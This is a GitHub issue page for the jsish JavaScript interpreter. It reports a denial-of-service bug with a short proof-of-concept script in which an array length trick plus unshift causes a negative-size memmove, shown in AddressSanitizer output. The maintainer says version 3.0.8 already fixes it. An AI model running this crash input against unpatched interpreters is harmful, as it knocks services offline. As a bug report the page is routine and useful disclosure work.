Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

DOS #15

Closed
bird8693 opened this issue May 20, 2020 · 3 comments
Closed

DOS #15

bird8693 opened this issue May 20, 2020 · 3 comments

Comments

@bird8693
Copy link

Enviroment

operating system: ubuntu18.04
compile command: export JSI__SANITIZE=1 && make
test command: ./jsish poc

poc:

var arr = [
    {
        a: 1,
        b: 2
    },
    {
        a: 1,
        b: 2
    },
    {
        a: 1,
        b: 2
    }
];
arr.length = ~arr;
arr.unshift(-9007199254740991, 153, 10000, 1e+81);

vulnerability description:

ASAN outputs the following error. It seems that it is operating Jsi_ObjArraySizer, which causes negative values to be passed into realloc. For correct operation, abnormal parameters should be detected.

=================================================================
==91080==ERROR: AddressSanitizer: negative-size-param: (size=-8)
    #0 0x7f47518aa05d in __asan_memmove (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8d05d)
    #1 0x483c77 in jsi_ArrayUnshiftCmd src/jsiArray.c:816
    #2 0x59e6a6 in jsi_FunctionSubCall src/jsiEval.c:855
    #3 0x59f349 in jsiEvalFunction src/jsiEval.c:916
    #4 0x5a3e0c in jsi_evalcode_sub src/jsiEval.c:1306
    #5 0x5b28b8 in jsi_evalcode src/jsiEval.c:2154
    #6 0x5b5e1c in jsi_evalStrFile src/jsiEval.c:2468
    #7 0x5b6749 in Jsi_EvalFile src/jsiEval.c:2517
    #8 0x43bd4c in Jsi_Main src/jsiInterp.c:922
    #9 0x6996e9 in jsi_main src/main.c:44
    #10 0x6997d4 in main src/main.c:52
    #11 0x7f4750d4982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #12 0x414cb8 in _start (/home/node/xjsish/jsish+0x414cb8)

0x60c000015940 is located 0 bytes inside of 128-byte region [0x60c000015940,0x60c0000159c0)
allocated by thread T0 here:
    #0 0x7f47518b5961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961)
    #1 0x44ecd9 in Jsi_Realloc src/jsiUtils.c:47
    #2 0x4d16ea in Jsi_ObjArraySizer src/jsiObj.c:427
    #3 0x4d182f in Jsi_ObjNewArray src/jsiObj.c:441
    #4 0x5b00ca in jsi_evalcode_sub src/jsiEval.c:1914
    #5 0x5b28b8 in jsi_evalcode src/jsiEval.c:2154
    #6 0x5b5e1c in jsi_evalStrFile src/jsiEval.c:2468
    #7 0x5b6749 in Jsi_EvalFile src/jsiEval.c:2517
    #8 0x43bd4c in Jsi_Main src/jsiInterp.c:922
    #9 0x6996e9 in jsi_main src/main.c:44
    #10 0x6997d4 in main src/main.c:52
    #11 0x7f4750d4982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: negative-size-param ??:0 __asan_memmove
==91080==ABORTING
```
@pcmacdon
Copy link
Owner

pcmacdon commented May 20, 2020
edited
Loading

Can not reproduce. I believe this was fixed in release "3.0.8".
Could you run "jsish -v" to check which version you are seeing this in?

Hint: memmove is no longer at jsi_ArrayUnshiftCmd src/jsiArray.c:816

@bird8693
Copy link
Author

Can not reproduce. I believe this was fixed in release "3.0.8".
Could you run "jsish -v" to check which version you are seeing this in?

Hint: memmove is no longer at jsi_ArrayUnshiftCmd src/jsiArray.c:816

OK! It has indeed been fixed!

@pcmacdon
Copy link
Owner

Perfect!

This was referenced Oct 20, 2020
Open
Closed
Closed
Closed
Closed
Closed
This was referenced Oct 31, 2020
Closed
Closed
Closed
@pcmacdon pcmacdon mentioned this issue Jan 20, 2024
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@bird8693 @pcmacdon